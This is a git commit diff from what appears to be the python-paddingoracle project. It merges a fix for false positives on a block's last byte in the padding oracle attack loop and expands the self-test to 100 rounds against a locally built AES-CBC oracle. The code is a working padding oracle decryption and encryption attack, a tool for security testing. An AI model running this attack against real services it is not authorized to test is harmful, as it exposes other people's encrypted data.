Merge pull request mwielgoszewski#5 from lanjelot/fix_false_positives

mwielgoszewski · mwielgoszewski · commit 41241029be0a · 2016-01-19T22:46:16.000-05:00
Fix false positives on a block's last byte
diff --git a/paddingoracle.py b/paddingoracle.py
@@ -160,29 +160,37 @@ def bust(self, block, block_size=8, **kwargs):
         :param int block_size: Cipher block size (in bytes).
         :returns: A bytearray containing the decrypted bytes
         '''
-        intermediate_bytes = bytearray()
+        intermediate_bytes = bytearray(block_size)
 
         test_bytes = bytearray(block_size)  # '\x00\x00\x00\x00...'
         test_bytes.extend(block)
 
         self.log.debug('Processing block %r', str(block))
 
-        # Work on one byte at a time, starting with the last byte
-        # and moving backwards
+        retries = 0
+        last_ok = 0
+        while retries < self.max_retries:
 
-        for byte_num in reversed(xrange(block_size)):
-            retries = 0
-            successful = False
+            # Work on one byte at a time, starting with the last byte
+            # and moving backwards
 
-            # clear oracle history for each byte
+            for byte_num in reversed(xrange(block_size)):
 
-            self.history = []
+                # clear oracle history for each byte
 
-            # Break on first byte that returns an oracle, otherwise keep
-            # trying until we exceed the max retry attempts (default is 3)
+                self.history = []
 
-            while retries < self.max_retries and not successful:
-                for i in reversed(xrange(256)):
+                # Break on first value that returns an oracle, otherwise if we
+                # don't find a good value it means we have a false positive
+                # value for the last byte and we need to start all over again
+                # from the last byte. We can resume where we left off for the
+                # last byte though.
+
+                r = 256
+                if byte_num == block_size - 1 and last_ok > 0:
+                    r = last_ok
+
+                for i in reversed(xrange(r)):
 
                     # Fuzz the test byte
 
@@ -195,6 +203,10 @@ def bust(self, block, block_size=8, **kwargs):
                     try:
                         self.attempts += 1
                         self.oracle(test_bytes[:], **kwargs)
+
+                        if byte_num == block_size - 1:
+                            last_ok = i
+
                     except BadPaddingException:
 
                         # TODO
@@ -215,13 +227,11 @@ def bust(self, block, block_size=8, **kwargs):
                                            intermediate_bytes, self.__dict__)
                         raise
 
-                    successful = True
-
                     current_pad_byte = block_size - byte_num
                     next_pad_byte = block_size - byte_num + 1
                     decrypted_byte = test_bytes[byte_num] ^ current_pad_byte
 
-                    intermediate_bytes.insert(0, decrypted_byte)
+                    intermediate_bytes[byte_num] = decrypted_byte
 
                     for k in xrange(byte_num, block_size):
 
@@ -237,15 +247,18 @@ def bust(self, block, block_size=8, **kwargs):
 
                     break
 
-                if successful:
-                    break
                 else:
+                    self.log.debug("byte %d not found, restarting" % byte_num)
                     retries += 1
 
+                    break
             else:
-                raise RuntimeError('Could not decrypt byte %d in %r within '
-                                   'maximum allotted retries (%d)' % (
-                                   byte_num, block, self.max_retries))
+                break
+
+        else:
+            raise RuntimeError('Could not decrypt byte %d in %r within '
+                               'maximum allotted retries (%d)' % (
+                               byte_num, block, self.max_retries))
 
         return intermediate_bytes
 
@@ -284,46 +297,49 @@ def oracle(self, data):
 
     padbuster = PadBuster()
 
-    key = os.urandom(AES.block_size)
-    iv = bytearray(os.urandom(AES.block_size))
+    for _ in xrange(100):
+        key = os.urandom(AES.block_size)
+        iv = bytearray(os.urandom(AES.block_size))
+
+        print "Testing padding oracle exploit in DECRYPT mode"
+        cipher = AES.new(key, AES.MODE_CBC, str(iv))
+
+        data = pkcs7_pad(teststring, blklen=AES.block_size)
+        ctext = cipher.encrypt(data)
 
-    print "Testing padding oracle exploit in DECRYPT mode"
-    cipher = AES.new(key, AES.MODE_CBC, str(iv))
+        print "Key:        %r" % (key, )
+        print "IV:         %r" % (iv, )
+        print "Plaintext:  %r" % (data, )
+        print "Ciphertext: %r" % (ctext, )
 
-    data = pkcs7_pad(teststring, blklen=AES.block_size)
-    ctext = cipher.encrypt(data)
+        decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv)
 
-    decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv)
+        print "Decrypted:  %r" % (str(decrypted), )
+        print "\nRecovered in %d attempts\n" % (padbuster.attempts, )
 
-    print "Key:        %r" % (key, )
-    print "IV:         %r" % (iv, )
-    print "Plaintext:  %r" % (data, )
-    print "Ciphertext: %r" % (ctext, )
-    print "Decrypted:  %r" % (str(decrypted), )
-    print "\nRecovered in %d attempts\n" % (padbuster.attempts, )
+        assert decrypted == data, \
+            'Decrypted data %r does not match original %r' % (
+                decrypted, data)
 
-    assert decrypted == data, \
-        'Decrypted data %r does not match original %r' % (
-            decrypted, data)
+        print "Testing padding oracle exploit in ENCRYPT mode"
+        cipher2 = AES.new(key, AES.MODE_CBC, str(iv))
 
-    print "Testing padding oracle exploit in ENCRYPT mode"
-    cipher2 = AES.new(key, AES.MODE_CBC, str(iv))
+        encrypted = padbuster.encrypt(teststring, block_size=AES.block_size)
 
-    encrypted = padbuster.encrypt(teststring, block_size=AES.block_size)
+        print "Key:        %r" % (key, )
+        print "IV:         %r" % (iv, )
+        print "Plaintext:  %r" % (teststring, )
+        print "Ciphertext: %r" % (str(encrypted), )
 
-    decrypted = cipher2.decrypt(str(encrypted))[AES.block_size:]
-    decrypted = decrypted.rstrip(decrypted[-1])
+        decrypted = cipher2.decrypt(str(encrypted))[AES.block_size:]
+        decrypted = decrypted.rstrip(decrypted[-1])
 
-    print "Key:        %r" % (key, )
-    print "IV:         %r" % (iv, )
-    print "Plaintext:  %r" % (teststring, )
-    print "Ciphertext: %r" % (str(encrypted), )
-    print "Decrypted:  %r" % (str(decrypted), )
-    print "\nRecovered in %d attempts" % (padbuster.attempts, )
+        print "Decrypted:  %r" % (str(decrypted), )
+        print "\nRecovered in %d attempts" % (padbuster.attempts, )
 
-    assert decrypted == teststring, \
-        'Encrypted data %r does not decrypt to %r, got %r' % (
-            encrypted, teststring, decrypted)
+        assert decrypted == teststring, \
+            'Encrypted data %r does not decrypt to %r, got %r' % (
+                encrypted, teststring, decrypted)
 
 
 if __name__ == '__main__':
